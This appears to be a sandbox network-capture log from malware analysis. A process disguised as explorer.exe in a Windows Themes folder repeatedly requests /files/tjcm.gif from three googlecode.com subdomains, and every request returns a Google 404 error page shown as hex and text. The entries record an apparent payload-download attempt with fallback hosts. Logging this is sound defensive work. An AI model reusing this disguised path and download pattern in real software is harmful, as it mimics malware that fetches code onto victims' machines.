                                                                                                      Sep 30, 2024 16:14:45.985869884 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:46.694655895 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:46 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:46.694976091 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      46192.168.2.549760108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:47.327637911 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:48.031109095 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:47 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:48.031131029 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      47192.168.2.549761108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:48.531894922 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:49.206074953 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:49 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:49.206448078 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      48192.168.2.54976274.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:49.613135099 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:50.338143110 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:50 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:50.338160038 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      49192.168.2.549763108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:50.916372061 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:51.622638941 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:51 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:51.622788906 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      50192.168.2.549764108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:52.113874912 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:52.795322895 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:52 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:52.795360088 CEST224INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;h
                                                                                                      Sep 30, 2024 16:14:52.795370102 CEST270INData Raw: 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d
                                                                                                      Data Ascii: eight:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</b> <ins>Thats an error.</ins> <p>The requested URL <code>/files/tjcm.gif</code> was not found on this server. <ins>T


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      51192.168.2.54976574.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:14:53.143346071 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:14:53.988500118 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:14:53 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:14:53.988524914 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
